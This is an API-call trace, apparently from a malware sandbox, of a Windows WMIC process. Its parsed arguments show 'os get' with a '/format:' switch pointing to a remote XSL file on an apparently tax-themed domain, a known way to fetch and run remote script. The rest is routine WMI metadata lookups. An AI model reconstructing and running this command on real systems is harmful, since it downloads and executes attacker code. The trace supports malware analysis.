	[0050.637] IWbemClassObject:Get (in: This=0x233e12b4830, wszName="Text", lFlags=0, pVal=0x350027f190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f190*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bcd0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e1270e50, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.637] SafeArrayGetLBound (in: psa=0x233e128bcd0, nDim=0x1, plLbound=0x350027f168 | out: plLbound=0x350027f168) returned 0x0
	[0050.637] SafeArrayGetUBound (in: psa=0x233e128bcd0, nDim=0x1, plUbound=0x350027f16c | out: plUbound=0x350027f16c) returned 0x0
	[0050.637] SafeArrayGetElement (in: psa=0x233e128bcd0, rgIndices=0x350027f158, pv=0x350027f170 | out: pv=0x350027f170) returned 0x0
	[0050.637] SysStringLen (param_1="Installed Operating System/s management. ") returned 0x29
	[0050.637] IUnknown:Release (This=0x233e12b4830) returned 0x0
	[0050.637] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.637] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.637] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.637] lstrlenW (lpString="Installed Operating System/s management. ") returned 41
	[0050.637] lstrlenW (lpString="Installed Operating System/s management. ") returned 41
	[0050.637] IUnknown:Release (This=0x233e12748a0) returned 0x0
	[0050.638] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.638] lstrlenW (lpString="PATH") returned 4
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="PATH", cchCount2=4) returned 1
	[0050.638] lstrlenW (lpString="WHERE") returned 5
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="WHERE", cchCount2=5) returned 1
	[0050.638] lstrlenW (lpString="(") returned 1
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="(", cchCount2=1) returned 3
	[0050.638] lstrlenW (lpString="/") returned 1
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
	[0050.638] lstrlenW (lpString="-") returned 1
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
	[0050.638] lstrlenW (lpString="GET") returned 3
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0050.638] lstrlenW (lpString="/") returned 1
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
	[0050.638] lstrlenW (lpString="-") returned 1
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] lstrlenW (lpString="GET") returned 3
	[0050.638] lstrlenW (lpString="get") returned 3
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0050.638] lstrlenW (lpString="/") returned 1
	[0050.638] lstrlenW (lpString="/") returned 1
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
	[0050.638] lstrlenW (lpString="/") returned 1
	[0050.638] lstrlenW (lpString="/") returned 1
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
	[0050.638] lstrlenW (lpString="?") returned 1
	[0050.638] lstrlenW (lpString="format") returned 6
	[0050.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="?", cchCount2=1) returned 3
	[0050.639] lstrlenW (lpString="VALUE") returned 5
	[0050.639] lstrlenW (lpString="format") returned 6
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="VALUE", cchCount2=5) returned 1
	[0050.639] lstrlenW (lpString="ALL") returned 3
	[0050.639] lstrlenW (lpString="format") returned 6
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ALL", cchCount2=3) returned 3
	[0050.639] lstrlenW (lpString="FORMAT") returned 6
	[0050.639] lstrlenW (lpString="format") returned 6
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2
	[0050.639] lstrlenW (lpString="/") returned 1
	[0050.639] lstrlenW (lpString=":") returned 1
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="/", cchCount2=1) returned 3
	[0050.639] lstrlenW (lpString="-") returned 1
	[0050.639] lstrlenW (lpString=":") returned 1
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="-", cchCount2=1) returned 3
	[0050.639] lstrlenW (lpString=":") returned 1
	[0050.639] lstrlenW (lpString=":") returned 1
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2=":", cchCount2=1) returned 2
	[0050.639] lstrlenW (lpString="/") returned 1
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="https://itaxkenya.com/kra/tax_returns.xsl", cchCount1=41, lpString2="/", cchCount2=1) returned 3
	[0050.639] lstrlenW (lpString="-") returned 1
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="https://itaxkenya.com/kra/tax_returns.xsl", cchCount1=41, lpString2="-", cchCount2=1) returned 3
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] lstrlenW (lpString="CSV") returned 3
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] lstrlenW (lpString="HFORM") returned 5
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] lstrlenW (lpString="HTABLE") returned 6
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] lstrlenW (lpString="LIST") returned 4
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] lstrlenW (lpString="MOF") returned 3
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] lstrlenW (lpString="RAWXML") returned 6
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] lstrlenW (lpString="TABLE") returned 5
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] lstrlenW (lpString="VALUE") returned 5
	[0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="VALUE", cchCount1=5, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.639] lstrlenW (lpString="XML") returned 3
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XML", cchCount1=3, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="htable-sortby") returned 13
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby", cchCount1=13, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="htable-sortby.xsl") returned 17
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby.xsl", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="texttablewsys") returned 13
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys", cchCount1=13, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="texttablewsys.xsl") returned 17
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys.xsl", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="wmiclimofformat") returned 15
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat", cchCount1=15, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="wmiclimofformat.xsl") returned 19
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat.xsl", cchCount1=19, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="wmiclitableformat") returned 17
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="wmiclitableformat.xsl") returned 21
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat.xsl", cchCount1=21, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="wmiclitableformatnosys") returned 22
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys", cchCount1=22, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="wmiclitableformatnosys.xsl") returned 26
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys.xsl", cchCount1=26, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="wmiclivalueformat") returned 17
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0050.640] lstrlenW (lpString="wmiclivalueformat.xsl") returned 21
	[0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat.xsl", cchCount1=21, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0050.640] ??0CHString@@QEAA@PEBG@Z () returned 0x350027f148
	[0050.640] ?Right@CHString@@QEBA?AV1@H@Z () returned 0x350027f140
	[0050.640] ??0CHString@@QEAA@PEBG@Z () returned 0x350027f198
	[0050.640] _wcsicmp (_String1=".xsl", _String2=".xsl") returned 0
	[0050.640] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.640] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.640] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.640] GetCurrentThreadId () returned 0xdf0
	[0050.640] ??0CHString@@QEAA@XZ () returned 0x350027f048
	[0050.641] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
	[0050.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bdbc0, cbMultiByte=-1, lpWideCharStr=0x233e14fbcf0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
	[0050.641] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
	[0050.641] SysStringLen (param_1="os") returned 0x2
	[0050.641] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e
	[0050.641] SysStringLen (param_1="'") returned 0x1
	[0050.641] IWbemServices:GetObject (in: This=0x233e1287c80, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0x350027f088*=0x0, ppCallResult=0x0 | out: ppObject=0x350027f088*=0x233e12748a0, ppCallResult=0x0) returned 0x0
	[0050.648] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="Formats", lFlags=0, pVal=0x350027f110*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f110*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128c210*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e128bcc0, rgsabound=((cElements=0x7, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.650] lstrlenW (lpString="SET") returned 3
	[0050.650] lstrlenW (lpString="get") returned 3
	[0050.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
	[0050.650] SafeArrayGetLBound (in: psa=0x233e128c210, nDim=0x1, plLbound=0x350027f0b0 | out: plLbound=0x350027f0b0) returned 0x0
	[0050.650] SafeArrayGetUBound (in: psa=0x233e128c210, nDim=0x1, plUbound=0x350027f0c8 | out: plUbound=0x350027f0c8) returned 0x0
	[0050.650] SafeArrayGetElement (in: psa=0x233e128c210, rgIndices=0x350027f098, pv=0x350027f068 | out: pv=0x350027f068) returned 0x0
	[0050.650] IWbemClassObject:Get (in: This=0x233e12b6be0, wszName="Name", lFlags=0, pVal=0x350027f0e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f0e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STATUS", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.650] lstrlenW (lpString="FULL") returned 4
	[0050.650] lstrlenW (lpString="STATUS") returned 6
	[0050.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STATUS", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
	[0050.650] IUnknown:Release (This=0x233e12b6be0) returned 0x1
	[0050.650] SafeArrayGetElement (in: psa=0x233e128c210, rgIndices=0x350027f098, pv=0x350027f068 | out: pv=0x350027f068) returned 0x0
	[0050.650] IWbemClassObject:Get (in: This=0x233e1274b50, wszName="Name", lFlags=0, pVal=0x350027f0e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e438, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f0e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FREE", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.650] lstrlenW (lpString="FULL") returned 4
	[0050.650] lstrlenW (lpString="FREE") returned 4
	[0050.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FREE", cchCount1=4, lpString2="FULL", cchCount2=4) returned 1
	[0050.651] IUnknown:Release (This=0x233e1274b50) returned 0x1
	[0050.651] SafeArrayGetElement (in: psa=0x233e128c210, rgIndices=0x350027f098, pv=0x350027f068 | out: pv=0x350027f068) returned 0x0
	[0050.651] IWbemClassObject:Get (in: This=0x233e12c4720, wszName="Name", lFlags=0, pVal=0x350027f0e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e438, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f0e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FULL", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.651] lstrlenW (lpString="FULL") returned 4
	[0050.651] lstrlenW (lpString="FULL") returned 4
	[0050.651] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FULL", cchCount1=4, lpString2="FULL", cchCount2=4) returned 2
	[0050.651] IWbemClassObject:Get (in: This=0x233e12c4720, wszName="Properties", lFlags=0, pVal=0x350027f128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f128*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b6d0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1274e00, rgsabound=((cElements=0x33, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.653] SafeArrayGetLBound (in: psa=0x233e128b6d0, nDim=0x1, plLbound=0x350027f0d0 | out: plLbound=0x350027f0d0) returned 0x0
	[0050.653] SafeArrayGetUBound (in: psa=0x233e128b6d0, nDim=0x1, plUbound=0x350027f0d8 | out: plUbound=0x350027f0d8) returned 0x0
	[0050.653] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.653] IWbemClassObject:Get (in: This=0x233e12d1730, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.653] IWbemClassObject:Get (in: This=0x233e12d1730, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.653] GetCurrentThreadId () returned 0xdf0
	[0050.653] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.653] IWbemClassObject:Get (in: This=0x233e12d1730, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The BootDevice property indicates the name of the disk drive from which the Win32 operating system boots. /nExample: \\\\Device\\Harddisk0.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.653] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.653] lstrlenA (lpString="") returned 0
	[0050.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fbd40, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.654] SysStringLen (param_1="The BootDevice property indicates the name of the disk drive from which the Win32 operating system boots. /nExample: \\\\Device\\Harddisk0.") returned 0x88
	[0050.654] SysStringLen (param_1="") returned 0x0
	[0050.654] GetCurrentThreadId () returned 0xdf0
	[0050.654] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.654] IWbemClassObject:Get (in: This=0x233e12d1730, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.654] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.654] IUnknown:Release (This=0x233e12d1730) returned 0x1
	[0050.654] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.654] IWbemClassObject:Get (in: This=0x233e12d1ca0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e5e8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.654] IWbemClassObject:Get (in: This=0x233e12d1ca0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12910e8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.654] GetCurrentThreadId () returned 0xdf0
	[0050.654] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.654] IWbemClassObject:Get (in: This=0x233e12d1ca0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The BuildNumber property indicates the build number of the operating system.  It can be used for more precise versioning information than product release version numbers/nExample: 1381", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.655] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.655] lstrlenA (lpString="") returned 0
	[0050.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fbd40, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.655] SysStringLen (param_1="The BuildNumber property indicates the build number of the operating system.  It can be used for more precise versioning information than product release version numbers/nExample: 1381") returned 0xb8
	[0050.655] SysStringLen (param_1="") returned 0x0
	[0050.655] GetCurrentThreadId () returned 0xdf0
	[0050.655] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.655] IWbemClassObject:Get (in: This=0x233e12d1ca0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.655] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.656] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.656] SysStringLen (param_1="BootDevice") returned 0xa
	[0050.656] SysStringLen (param_1="BootDevice") returned 0xa
	[0050.656] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.656] IUnknown:Release (This=0x233e12d1ca0) returned 0x1
	[0050.656] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.656] IWbemClassObject:Get (in: This=0x233e12d21d0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291328, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.657] IWbemClassObject:Get (in: This=0x233e12d21d0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290c98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.657] GetCurrentThreadId () returned 0xdf0
	[0050.657] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.657] IWbemClassObject:Get (in: This=0x233e12d21d0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The BuildType property indicates the type of build used for the operating system. Examples are retail build and checked build.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.657] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.657] lstrlenA (lpString="") returned 0
	[0050.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fbd40, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.657] SysStringLen (param_1="The BuildType property indicates the type of build used for the operating system. Examples are retail build and checked build.") returned 0x7e
	[0050.657] SysStringLen (param_1="") returned 0x0
	[0050.657] GetCurrentThreadId () returned 0xdf0
	[0050.658] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.658] IWbemClassObject:Get (in: This=0x233e12d21d0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
